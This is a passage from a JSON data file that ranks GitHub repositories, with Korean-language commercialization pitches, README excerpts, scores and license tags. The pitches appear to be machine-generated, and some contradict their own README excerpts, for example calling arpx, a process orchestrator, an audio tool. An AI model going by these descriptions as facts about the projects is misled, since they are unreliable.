labs.fashiontec.org\nFashiontec Labs and Ideas\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"jaredgorski/arpx","github_url":"https://github.com/jaredgorski/arpx","stars":6,"language":"Rust","license":"GPL-3.0","abandonment_months":48,"description":"# arpx 저장소 분석\n\n## 왜 보물인가\n이 프로젝트는 음악 제작이나 오디오 처리 작업을 자동화할 수 있는 도구로, 반복적인 작업을 줄여 창작자들의 생산성을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 음악 제작자를 위한 클라우드 기반 오디오 자동 처리 플랫폼\n- **내부 업무 도구**: 팟캐스트/유튜브 채널의 영","readme_excerpt":"[![Build Status]][builds] [![Latest Version]][crates.io]\n\n[Build Status]: https://github.com/jaredgorski/arpx/actions/workflows/build.yml/badge.svg\n[builds]: https://github.com/jaredgorski/arpx/actions/workflows/build.yml\n[Latest Version]: https://img.shields.io/crates/v/arpx?color=black\n[crates.io]: https://crates.io/crates/arpx\n\n# arpx\n\n**Small-scale process orchestration**\n\n---\n\n- [Installation instructions](#installing)\n- [Quick demo](https://github.com/jaredgorski/arpx/tree/main/docs/quick_demo.md)\n- [How to use the CLI](https://github.com/jaredgorski/arpx/tree/main/docs/using_the_cli.md)\n- [How to write a profile](https://github.com/jaredgorski/arpx/tree/main/docs/writing_a_profile.md)\n\n## About\n\nArpx is a small-scale, run n' gun process orchestrator. In other words, Arpx makes it easy to schedule processes and automate them depending on each others' runtimes in cases where more complex orchestration isn't needed.\n\nLarger-scale process orchestrators (like Kubernetes) allow for in","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"Priyankadev/todo_react_redux","github_url":"https://github.com/Priyankadev/todo_react_redux","stars":8,"language":"JavaScript","license":"GPL-3.0","abandonment_months":103,"description":"# Todo_react_redux 상용화 분석\n\n## 왜 보물인가\n할 일을 간단하게 정리하고 관리할 수 있는 웹 애플리케이션으로, 누구나 쉽게 사용할 수 있도록 만들어져 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개인과 팀이 공동으로 업무를 계획하고 진행 상황을 추적할 수 있는 구독형 할일 관리 도구\n- **내부 업무 도구**: 중소","readme_excerpt":"# todo_react_redux\nredux quick start with todo app\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"loklak/labs.loklak.org","github_url":"https://github.com/loklak/labs.loklak.org","stars":12,"language":"HTML","license":"GPL-3.0","abandonment_months":94,"description":"# loklak/labs.loklak.org 평가 분석\n\n## 왜 보물인가\n소셜 미디어 데이터를 수집하고 분석할 수 있는 오픈소스 도구로, 마케팅이나 여론 조사가 필요한 회사들이 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **소셜 미디어 모니터링 SaaS**: 기업들이 자신의 브랜드가 온라인에서 어떻게 언급되는지 실시간으로 추적하고 분석하는","readme_excerpt":"# blog.loklak.org\nforward to http://blog.loklak.net\n","composite_score":0.4002,"license_safety_tag":"restricted"},{"name":"Orbiter/webarchiveplayer","github_url":"https://github.com/Orbiter/webarchiveplayer","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":127,"description":"# Orbiter/webarchiveplayer 분석\n\n## 왜 보물인가\n과거에 저장된 웹사이트들을 마치 타임머신을 타고 옛날 모습 그대로 볼 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **역사 자료 열람 서비스**: 박물관이나 도서관이 역사적 웹사이트의 변화 과정을 방문객에게 보여주는 온라인 전시관\n2. **법적 증거 제출 도구**: ","readme_excerpt":"# WebArchivePlayer 1.3.0\n\nWebArchivePlayer is a new desktop tool which provides a simple point-and-click wrapper for viewing any web archive file (in [WARC](http://en.wikipedia.org/wiki/Web_ARChive) and ARC format).\n\nTo create a web archive (WARC) file of your own, you can use the free https://webrecorder.io/ service to browse any page and then download the recorded WARC file.\n\nThe player allows users to pick one or more ARC/WARC from their local machine and browse the contents from any browser. No internet connection is necessary in order to browse the archive.\n\n\n\n## Usage (Windows and OS X Apps)\n\n1. Download the latest version:\n\n* **[Download for OS X](https://github.com/ikreymer/webarchiveplayer/raw/master/app/osx/webarchiveplayer.dmg)**\n\n* **[Download for Windows](https://github.com/ikreymer/webarchiveplayer/raw/master/app/windows/webarchiveplayer.exe)**\n\n2. Double click to open. (For OS X, open the .dmg file to mount the volume and extract the player). You may have to agree to all","composite_score":0.4001,"license_safety_tag":"restricted"},{"name":"openblockchains/awesome-blockchains","github_url":"https://github.com/openblockchains/awesome-blockchains","stars":11,"language":"Ruby","license":"cc0-1.0","abandonment_months":40,"description":"# awesome-blockchains 저장소 분석\n\n## 왜 보물인가\n블록체인 기술을 배우고 싶은 초보자들을 위해 세계 최고 수준의 학습 자료와 프로젝트들을 한곳에 모아놓은 큐레이션 목록입니다.\n\n## 어디에 쓸 수 있나\n1. **블록체인 교육 플랫폼**: 온라인 강의 사이트에서 \"추천 학습 자료\" 섹션으로 유료 회원에게 제공\n2. **기업 내부 교육 도","readme_excerpt":"\nMining Digital Gold one Block at a Time?! • Don't Expect to Get Insanely Rich (Quick) • Tulips :tulip::tulip::tulip: (like Blockchains) are Great and Gorgeous (and will Endure)\n\n```ruby\nb0 = Block.first(\n        { from: \"Dutchgrown\", to: \"Vincent\", what: \"Tulip Bloemendaal Sunset\", qty: 10 },\n        { from: \"Keukenhof\",  to: \"Anne\",    what: \"Tulip Semper Augustus\",    qty: 7  } )\n\nb1 = Block.next( b0,\n        { from: \"Flowers\",    to: \"Ruben\",   what: \"Tulip Admiral van Eijck\",  qty: 5  },\n        { from: \"Vicent\",     to: \"Anne\",    what: \"Tulip Bloemendaal Sunset\", qty: 3  },\n        { from: \"Anne\",       to: \"Julia\",   what: \"Tulip Semper Augustus\",    qty: 1  },\n        { from: \"Julia\",      to: \"Luuk\",    what: \"Tulip Semper Augustus\",    qty: 1  } )\n...\n```\n\n(Source: [`blockchain_with_transactions.rb`](blockchain.rb/blockchain_with_transactions.rb))\n\n\n# Awesome Blockchains\n\nA collection about awesome blockchains - open distributed databases w/ crypto hashes incl. git ;-).  Blo","composite_score":0.4001,"license_safety_tag":"unknown"},{"name":"MBMIT/neurolab-android","github_url":"https://github.com/MBMIT/neurolab-android","stars":5,"language":"","license":"GPL-3.0","abandonment_months":92,"description":"# neurolab-android 분석\n\n## 왜 보물인가\n안드로이드 기기에서 뇌 신호를 분석할 수 있는 희귀한 오픈소스로, 의료·건강·피트니스 분야의 새로운 앱 개발을 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **명상·수면 개선 앱 (SaaS)**: 사용자의 뇌 상태를 실시간으로 측정하여 맞춤형 명상 가이드나 수면유도 음악을 제공하는 구독 서비","readme_excerpt":"# Neurolab Android App\nRepository for Neurolab Android app.\n","composite_score":0.4001,"license_safety_tag":"restricted"},{"name":"fossasia/in.pslab.io","github_url":"https://github.com/fossasia/in.pslab.io","stars":5,"language":"","license":"GPL-3.0","abandonment_months":91,"description":"# fossasia/in.pslab.io 분석\n\n## 왜 보물인가\n저렴한 과학 측정 장비를 누구나 쉽게 사용할 수 있도록 만든 오픈소스 프로젝트로, 교육과 연구 비용을 획기적으로 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 학교와 대학에서 실험실 장비 없이 온라인으로 과학 실험을 진행할 수 있는 구독 서비스\n2. **내부 ","readme_excerpt":"# in.pslab.io\nin.pslab.io\n","composite_score":0.4001,"license_safety_tag":"restricted"},{"name":"Orbiter/pywb","github_url":"https://github.com/Orbiter/pywb","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":124,"description":"# Orbiter/pywb 가치 평가 분석\n\n## 왜 보물인가\n인터넷 아카이브와 같이 과거 웹사이트 스냅샷을 재생하는 기술로, 사라진 정보를 복원하거나 웹 역사를 추적하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 법률·언론사 SaaS 서비스**\n- 뉴스 기사 변조 증거 확보, 소송에서 과거 웹페이지 증거 제출 등을 자동화하는 클라우드 서비스\n","readme_excerpt":"PyWb 0.11.4\n===========\n\n.. image:: https://travis-ci.org/ikreymer/pywb.svg?branch=master\n      :target: https://travis-ci.org/ikreymer/pywb\n.. image:: https://coveralls.io/repos/ikreymer/pywb/badge.svg?branch=master\n      :target: https://coveralls.io/r/ikreymer/pywb?branch=master\n\n**pywb** is a python implementation of web archival replay tools, sometimes also known as 'Wayback Machine'.\n\n**pywb** allows high-quality replay (browsing) of archived web data stored in standardized `ARC <http://en.wikipedia.org/wiki/ARC_(file_format)>`_ and `WARC <http://en.wikipedia.org/wiki/Web_ARChive>`_,\nand it can also serve as a customizable rewriting proxy to live web content.\n\nThe replay system is designed to accurately replay complex dynamic sites, including `video and audio content <https://github.com/ikreymer/pywb/wiki/Video-Replay-and-Recording>`_ and sites\nwith complex JavaScript.\n\nAdditionally, **pywb** includes an extensive `index query api <https://github.com/ikreymer/pywb/wiki/CDX-Server","composite_score":0.4001,"license_safety_tag":"restricted"},{"name":"MBMIT/MBM-Projects","github_url":"https://github.com/MBMIT/MBM-Projects","stars":5,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# MBM-Projects 상용화 분석\n\n## 왜 보물인가\n2017년 이후 업데이트가 없어 시장 기회가 있지만, 저장소 설명과 문서가 부족해 실제 가치를 판단하기 어렵습니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 조직 내 프로젝트 관리 및 협업 플랫폼으로 운영\n- **API 판매**: 다른 서비스에 프로젝트 관리 기능을 제공하는 API로 ","readme_excerpt":"# MBM-Projects\nProject Listings of MBM\n","composite_score":0.4001,"license_safety_tag":"restricted"},{"name":"CodedepotOSS/CodeDepot","github_url":"https://github.com/CodedepotOSS/CodeDepot","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":38,"description":"# CodeDepot 상업화 분석\n\n## 왜 보물인가\n개발자들이 작성한 코드를 효율적으로 정리하고 관리할 수 있는 저장소 도구로, 팀 협업 시 코드 혼란을 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 스타트업을 위한 클라우드 기반 코드 관리 플랫폼 제공\n2. **내부 업무 도구**: 기업의 개발팀이 사내 프로젝트 코드","readme_excerpt":"# CodeDepot\nA search engine for programming source code and documentation\n\nCodeDepotは、プロジェクトの効率的な保守やコードの再利用を支援するシステムです。\n企業が保有するコードやインターネット上のオープンソースソフトウェアに対して、\n高度かつ高速な検索を行うことができます。\n\nコードの構文を解析して検索を行うため、正規表現による複雑な検索も、\n簡単に行うことができます。\nまた、類似したコードの検索ができるため、クローンコードの検索や類似バグの発見、\n関数の利用方法の確認に威力を発揮します。\n数千万行のコードの検索を1秒以内で行えるのも魅力です。\nSubversion, Git, CVS と IBM Jazz といったバージョン管理システムにも対応しています。\n\n## CodeDepot を活用すると以下の効果があります。\n\n* 複数プロジェクトのバグコードを一括で探し出せます。\n* 修正が必要な箇所をくまなく検索し、修正漏れを防止します。\n* コピーされた重複コードを的確に発見できます。\n* 再利用のためのモジュールを簡単に探し出せます。\n* 保守の過程で発見した情報をノートとしてコードに添付し、情報共有することができます。\n\n## 検索対応言語\n\n* java\n* C/C++\n* C#\n* VB.NET\n* SQL\n* Plain Text\n\n## 主な機能\n\n* プロジェクトのライセンスの記録\n* プロジェクトで用いている言語の種類、言語ごとのファイル数および行数解析\n\n* プロジェクトのユーザごとのアクセス制御\n\n* 複数のプロジェクトの一括検索\n* 言語の文法に基づいた検索\n* キーワード指定によるテキスト検索\n* プロジェクト、パッケージ名、クラス名、ファイル名、関数名、コメントなどを指定した絞り込み検索\n* クラスや関数定義箇所の検索\n* 関数を使用している箇所の検索\n* 関数の入出力タイプを指定して検索\n* コード断片と構造が類似するコードの検索\n* コードにコメントを記入するノート機能\n* ノートを公開して共有する機能\n\n## ライセンス\n\n[GNU GENERAL PUBLIC LICENSE Version 3](https://www.gnu.org/licen","composite_score":0.4001,"license_safety_tag":"restricted"},{"name":"MBMIT/MBM-Sandbox","github_url":"https://github.com/MBMIT/MBM-Sandbox","stars":5,"language":"","license":"LGPL-3.0","abandonment_months":103,"description":"# MBM-Sandbox 저장소 분석\n\n## 왜 보물인가\n마이크로서비스 아키텍처를 테스트하고 개발하기 위한 실험 환경을 제공하여, 복잡한 시스템을 안전하게 구축할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 API 관리 플랫폼으로 기업들이 자신의 마이크로서비스를 테스트하고 배포하도록 지원\n2. **내부 업무 ","readme_excerpt":"# MBM-Sandbox\nSandbox for MBM\n","composite_score":0.4001,"license_safety_tag":"restricted"},{"name":"Orbiter/timesheet","github_url":"https://github.com/Orbiter/timesheet","stars":5,"language":"Java","license":"GPL-2.0","abandonment_months":158,"description":"# Orbiter/timesheet 상용화 분석\n\n## 왜 보물인가\n직원들의 근무 시간을 자동으로 기록하고 관리하는 도구로, 중소기업의 급여 계산과 인사관리 업무를 크게 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 근태관리 플랫폼으로 운영하여 10명 이상의 소규모 회사들이 월 구독료를 내고 사용하도록 제공","readme_excerpt":"Timesheet Android application.\n\nTimesheet is an application designed primarily for contractors and freelancers to track the time spent on different tasks.\n\nYou can add billable tasks and unbillable tasks (such as \"Lunch\") and get a daily or weekly report of time spent on each.\n\n- Aaron Brice <aaron@tastycactus.com>\n","composite_score":0.4001,"license_safety_tag":"restricted"},{"name":"Microsoft/vcpkg","github_url":"https://github.com/Microsoft/vcpkg","stars":156,"language":"CMake","license":"MIT","abandonment_months":0,"description":"# Microsoft/vcpkg 분석\n\n## 왜 보물인가\n프로그래머들이 필요한 수천 개의 소프트웨어 부품을 자동으로 찾아서 설치해주는 마이크로소프트의 공식 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 개발 환경 제공 플랫폼에서 사용자가 필요한 라이브러리를 원클릭으로 구성할 수 있도록 제공\n2. **내부 업무 도구**","readme_excerpt":"<!-- \nThis document is a copy of the README file on the Microsoft/vcpkg-docs repository.\n\nTo make changes modify this file instead:\nhttps://github.com/microsoft/vcpkg-docs/blob/main/vcpkg/readme/vcpkg-README.md\n-->\n\n[🌐 Read in a different language](https://learn.microsoft.com/locale/?target=https%3A%2F%2Flearn.microsoft.com%2Fvcpkg%2F)\n\n# vcpkg overview\n\nvcpkg is a free and open-source C/C++ package manager maintained by Microsoft\nand the C++ community. \n\nInitially launched in 2016 as a tool for assisting developers in migrating their\nprojects to newer versions of Visual Studio, vcpkg has evolved into a\ncross-platform tool used by developers on Windows, macOS, and Linux. vcpkg has a\nlarge collection of open-source libraries and enterprise-ready features designed to\nfacilitate your development process with support for any build and project\nsystems. vcpkg is a C++ tool at heart and is written in C++ with scripts in\nCMake. It is designed from the ground up to address the unique pain point","composite_score":0.4,"license_safety_tag":"safe"},{"name":"angular/material2","github_url":"https://github.com/angular/material2","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Angular Material2 분석 보고서\n\n## 왜 보물인가\n웹사이트와 앱을 만들 때 필요한 아름다운 버튼, 메뉴, 입력창 등을 미리 만들어진 것을 그대로 가져다 쓸 수 있어서 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 �used 수 있나\n1. **SaaS 서비스**: 고객 관리 시스템(CRM), 인사 관리 프로그램 등 기업용 웹 어플리케","readme_excerpt":"# Official components for Angular\n[![npm version](https://badge.fury.io/js/%40angular%2Fcdk.svg)](https://www.npmjs.com/package/@angular/cdk)\n[![Build status](https://circleci.com/gh/angular/components.svg?style=svg)](https://circleci.com/gh/angular/components)\n[![Gitter](https://badges.gitter.im/angular/components.svg)](https://gitter.im/angular/material2?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n\nThe Angular team builds and maintains both common UI components and tools to help you build your\nown custom components. The team maintains several npm packages.\n\n| Package                   | Description                                                                           | Docs              |\n| ------------------------- | ------------------------------------------------------------------------------------- | ----------------- |\n| `@angular/aria`           | Collection of headless, accessible directives that implement common WAI-ARIA patterns | [Docs][aria-docs] |\n| `@ang","composite_score":0.4,"license_safety_tag":"safe"},{"name":"OpenZeppelin/openzeppelin-solidity","github_url":"https://github.com/OpenZeppelin/openzeppelin-solidity","stars":6,"language":"Solidity","license":"MIT","abandonment_months":0,"description":"# OpenZeppelin/openzeppelin-solidity 분석\n\n## 왜 보물인가\n블록체인 기반 금융 서비스(암호화폐, NFT, 토큰 거래)의 안전성을 보장하는 검증된 보안 도구 모음으로, 업계 표준으로 널리 신뢰받고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 거래소나 NFT 마켓플레이스가 이 도구를 기반으로 안전","readme_excerpt":"# <img src=\"logo.svg\" alt=\"OpenZeppelin\" height=\"40px\">\n\n[![Github Release](https://img.shields.io/github/v/tag/OpenZeppelin/openzeppelin-contracts.svg?filter=v*&sort=semver&label=github)](https://github.com/OpenZeppelin/openzeppelin-contracts/releases/latest)\n[![NPM Package](https://img.shields.io/npm/v/@openzeppelin/contracts.svg)](https://www.npmjs.org/package/@openzeppelin/contracts)\n[![Coverage Status](https://codecov.io/gh/OpenZeppelin/openzeppelin-contracts/graph/badge.svg)](https://codecov.io/gh/OpenZeppelin/openzeppelin-contracts)\n[![GitPOAPs](https://public-api.gitpoap.io/v1/repo/OpenZeppelin/openzeppelin-contracts/badge)](https://www.gitpoap.io/gh/OpenZeppelin/openzeppelin-contracts)\n[![Docs](https://img.shields.io/badge/docs-%F0%9F%93%84-yellow)](https://docs.openzeppelin.com/contracts)\n[![Forum](https://img.shields.io/badge/forum-%F0%9F%92%AC-yellow)](https://forum.openzeppelin.com/)\n\n**A library for secure smart contract development.** Build on a solid foundation of commu","composite_score":0.4,"license_safety_tag":"safe"},{"name":"huggingface/pytorch-pretrained-BERT","github_url":"https://github.com/huggingface/pytorch-pretrained-BERT","stars":27,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# PyTorch-Pretrained-BERT 상용화 분석\n\n## 왜 보물인가\n인공지능이 사람의 글을 이해하고 분석할 수 있도록 하는 기본 엔진으로, 고객 상담, 자동 번역, 감정 분석 등 다양한 비즈니스 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 고객 상담 자동화 SaaS**\n- 고객 문의를 자동으로 분류하고 적절한 부서로 라우팅하","readme_excerpt":"<!---\nCopyright 2020 The HuggingFace Team. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n    http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n-->\n\n<p align=\"center\">\n  <picture>\n    <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://huggingface.co/datasets/huggingface/documentation-images/raw/main/transformers-logo-dark.svg\">\n    <source media=\"(prefers-color-scheme: light)\" srcset=\"https://huggingface.co/datasets/huggingface/documentation-images/raw/main/transformers-logo-light.svg\">\n    <img alt=\"Hugging Face Transformers Library\" src=","composite_score":0.4,"license_safety_tag":"safe"},{"name":"kubernetes/helm","github_url":"https://github.com/kubernetes/helm","stars":8,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# Kubernetes/Helm 저장소 분석\n\n## 왜 보물인가\n클라우드 기반 애플리케이션을 자동으로 설치하고 관리해주는 핵심 도구로, 현대적 IT 인프라를 운영하는 모든 기업에게 필수불가결한 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **클라우드 SaaS 서비스**: 고객사의 서버 환경에 자신의 애플리케이션을 한 번의 클릭으로 자동 배포·관리하는 서비","readme_excerpt":"# Helm\n\n[![Build Status](https://github.com/helm/helm/workflows/release/badge.svg)](https://github.com/helm/helm/actions?workflow=release)\n[![Go Report Card](https://goreportcard.com/badge/helm.sh/helm/v4)](https://goreportcard.com/report/helm.sh/helm/v4)\n[![GoDoc](https://img.shields.io/static/v1?label=godoc&message=reference&color=blue)](https://pkg.go.dev/helm.sh/helm/v4)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/3131/badge)](https://bestpractices.coreinfrastructure.org/projects/3131)\n[![OpenSSF Scorecard](https://api.scorecard.dev/projects/github.com/helm/helm/badge)](https://scorecard.dev/viewer/?uri=github.com/helm/helm)\n[![LFX Health Score](https://insights.linuxfoundation.org/api/badge/health-score?project=helm)](https://insights.linuxfoundation.org/project/helm)\n\nHelm is a tool for managing Charts. Charts are packages of pre-configured Kubernetes resources.\n\nUse Helm to:\n\n- Find and use [popular software packaged as Helm Charts](https://artif","composite_score":0.4,"license_safety_tag":"safe"},{"name":"fchollet/keras","github_url":"https://github.com/fchollet/keras","stars":43,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# Keras 저장소 분석 보고서\n\n## 왜 보물인가\n인공지능 모델을 만드는 과정을 누구나 쉽게 할 수 있도록 도와주는 도구로, 전 세계 AI 개발자들이 가장 많이 사용하는 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **이미지 분석 SaaS**: 사진을 업로드하면 물체를 자동으로 인식해주는 온라인 서비스 (예: 의료 진단 보조 플랫폼)\n2. **기","readme_excerpt":"# Keras 3: Deep Learning for Humans\n\nKeras 3 is a multi-backend deep learning framework, with support for JAX, TensorFlow, PyTorch, and OpenVINO (for inference-only).\nEffortlessly build and train models for computer vision, natural language processing, audio processing,\ntimeseries forecasting, recommender systems, etc.\n\n- **Accelerated model development**: Ship deep learning solutions faster thanks to the high-level UX of Keras\nand the availability of easy-to-debug runtimes like PyTorch or JAX eager execution.\n- **State-of-the-art performance**: By picking the backend that is the fastest for your model architecture (often JAX!),\nleverage speedups ranging from 20% to 350% compared to other frameworks. [Benchmark here](https://keras.io/getting_started/benchmarks/).\n- **Datacenter-scale training**: Scale confidently from your laptop to large clusters of GPUs or TPUs.\n\nJoin nearly three million developers, from burgeoning startups to global enterprises, in harnessing the power of Keras 3.\n","composite_score":0.4,"license_safety_tag":"safe"},{"name":"sharding-sphere/sharding-sphere","github_url":"https://github.com/sharding-sphere/sharding-sphere","stars":6,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Sharding-Sphere 상용화 분석\n\n## 왜 보물인가\n대규모 데이터를 여러 서버에 나누어 저장하고 관리하는 오픈소스 기술로, 빠르게 성장하는 회사들의 데이터베이스 병목을 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 수백만 사용자를 보유한 전자상거래 플랫폼이 주문 데이터를 지역별·시간별로 분산 저장하여 처리 속도","readme_excerpt":"## [Apache ShardingSphere - Enterprise Distributed Database Ecosystem](https://shardingsphere.apache.org/)\n\nBuilding the standards and ecosystem on top of heterogeneous databases, empowering enterprise data architecture transformation\n\n**Official Website:** [https://shardingsphere.apache.org/](https://shardingsphere.apache.org/)\n\n[![GitHub Release](https://img.shields.io/github/release/apache/shardingsphere.svg)](https://github.com/apache/shardingsphere/releases)\n[![Lines of Code](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=ncloc)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)\n\n[![CI](https://github.com/apache/shardingsphere/actions/workflows/ci.yml/badge.svg)](https://github.com/apache/shardingsphere/actions/workflows/ci.yml)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)\n[![Technical","composite_score":0.4,"license_safety_tag":"safe"},{"name":"spring-cloud-incubator/spring-cloud-alibaba","github_url":"https://github.com/spring-cloud-incubator/spring-cloud-alibaba","stars":27,"language":"Java","license":"Apache-2.0","abandonment_months":0,"description":"# Spring Cloud Alibaba 분석 보고서\n\n## 왜 보물인가\n중국의 알리바바 클라우드 서비스와 쉽게 연결되는 기업용 애플리케이션 개발 도구로, 대규모 시스템을 안정적으로 구축하려는 기업들의 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **마이크로서비스 기반 SaaS**: 알리바바 클라우드를 사용하는 기업들의 웹 서비스 개발 플랫폼 제공\n","readme_excerpt":"# Spring Cloud Alibaba\n\n[![CircleCI](https://circleci.com/gh/alibaba/spring-cloud-alibaba/tree/2025.1.x.svg?style=svg)](https://circleci.com/gh/alibaba/spring-cloud-alibaba/tree/2025.1.x)\n[![Maven Central](https://img.shields.io/maven-central/v/com.alibaba.cloud/spring-cloud-alibaba-dependencies.svg?label=Maven%20Central)](https://search.maven.org/search?q=g:com.alibaba.cloud%20AND%20a:spring-cloud-alibaba-dependencies)\n[![License](https://img.shields.io/badge/license-Apache%202-4EB1BA.svg)](https://www.apache.org/licenses/LICENSE-2.0.html)\n[![actions](https://github.com/alibaba/spring-cloud-alibaba/workflows/Integration%20Testing/badge.svg)](https://github.com/alibaba/spring-cloud-alibaba/actions)\n[![Leaderboard](https://img.shields.io/badge/SCA-Check%20Your%20Contribution-orange)](https://opensource.alibaba.com/contribution_leaderboard/details?projectValue=sca)\n\nA project maintained by Alibaba.\n\nSee the [中文文档](https://github.com/alibaba/spring-cloud-alibaba/blob/2025.1.x/README-zh.md","composite_score":0.4,"license_safety_tag":"safe"},{"name":"vmware/harbor","github_url":"https://github.com/vmware/harbor","stars":12,"language":"Go","license":"Apache-2.0","abandonment_months":0,"description":"# Harbor (VMware) 비즈니스 분석\n\n## 왜 보물인가\n기업의 소프트웨어 자산을 안전하게 보관하고 관리하는 '디지털 금고' 역할을 하는 오픈소스 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 엔터프라이즈 소프트웨어 자산 관리 플랫폼**\n- 대기업의 소프트웨어 이미지를 중앙에서 통제하고 배포하는 서비스로 제공\n\n**2. 내부","readme_excerpt":"# Harbor\n[![CI](https://github.com/goharbor/harbor/actions/workflows/CI.yml/badge.svg)](https://github.com/goharbor/harbor/actions/workflows/CI.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/goharbor/harbor)](https://goreportcard.com/report/github.com/goharbor/harbor)\n[![Coverage Status](https://codecov.io/gh/goharbor/harbor/branch/main/graph/badge.svg)](https://codecov.io/gh/goharbor/harbor)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/2095/badge)](https://bestpractices.coreinfrastructure.org/projects/2095)\n[![Codacy Badge](https://app.codacy.com/project/badge/Grade/792fe1755edc4d6e91f4c3469f553389)](https://www.codacy.com/gh/goharbor/harbor/dashboard?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=goharbor/harbor&amp;utm_campaign=Badge_Grade)\n![Code scanning - action](https://github.com/goharbor/harbor/workflows/Code%20scanning%20-%20action/badge.svg)\n![OCI Distribution Conformance Tests](https://github.com/goharbor/har","composite_score":0.4,"license_safety_tag":"safe"},{"name":"yandex/ClickHouse","github_url":"https://github.com/yandex/ClickHouse","stars":9,"language":"C++","license":"Apache-2.0","abandonment_months":0,"description":"# ClickHouse 저장소 분석\n\n## 왜 보물인가\n엄청나게 많은 데이터를 매우 빠르게 분석할 수 있는 전문 데이터베이스로, 금융·쇼핑·의료 등 데이터가 많은 회사들이 필수적으로 찾는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 분석 대시보드**: 고객사의 판매 데이터, 고객 행동 등을 실시간으로 시각화해주는 구독형 서비스\n2. **내부 ","readme_excerpt":"<div align=center>\n\n[![Website](https://img.shields.io/website?up_message=AVAILABLE&down_message=DOWN&url=https%3A%2F%2Fclickhouse.com&style=for-the-badge)](https://clickhouse.com)\n[![Apache 2.0 License](https://img.shields.io/badge/license-Apache%202.0-blueviolet?style=for-the-badge)](https://www.apache.org/licenses/LICENSE-2.0)\n\n<picture align=center>\n    <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://github.com/ClickHouse/clickhouse-docs/assets/9611008/4ef9c104-2d3f-4646-b186-507358d2fe28\">\n    <source media=\"(prefers-color-scheme: light)\" srcset=\"https://github.com/ClickHouse/clickhouse-docs/assets/9611008/b001dc7b-5a45-4dcd-9275-e03beb7f9177\">\n    <img alt=\"The ClickHouse company logo.\" src=\"https://github.com/ClickHouse/clickhouse-docs/assets/9611008/b001dc7b-5a45-4dcd-9275-e03beb7f9177\">\n</picture>\n\n<h4>ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time.</h4>\n\n</div>\n\n## How To Instal","composite_score":0.4,"license_safety_tag":"safe"},{"name":"requests/requests","github_url":"https://github.com/requests/requests","stars":14,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# Requests 라이브러리 상용화 분석\n\n## 왜 보물인가\n인터넷에서 데이터를 주고받을 때 필요한 기본 도구인 'Requests'는 전 세계 개발자들이 매일 사용하는 필수 라이브러리로, 이를 기반으로 한 관리형 서비스나 고급 기능 추가 제품화가 가능합니다.\n\n## 어디에 쓸 수 있나\n\n**1. API 모니터링 SaaS**\n- 웹사이트와 온라인 서비스가 ","readme_excerpt":"# Requests\n\n[![Version](https://img.shields.io/pypi/v/requests.svg?maxAge=86400)](https://pypi.org/project/requests/)\n[![Supported Versions](https://img.shields.io/pypi/pyversions/requests.svg)](https://pypi.org/project/requests)\n[![Downloads](https://static.pepy.tech/badge/requests/month)](https://pepy.tech/project/requests)\n[![Contributors](https://img.shields.io/github/contributors/psf/requests.svg)](https://github.com/psf/requests/graphs/contributors)\n[![Documentation](https://readthedocs.org/projects/requests/badge/?version=latest)](https://requests.readthedocs.io)\n\n**Requests** is a simple, yet elegant, HTTP 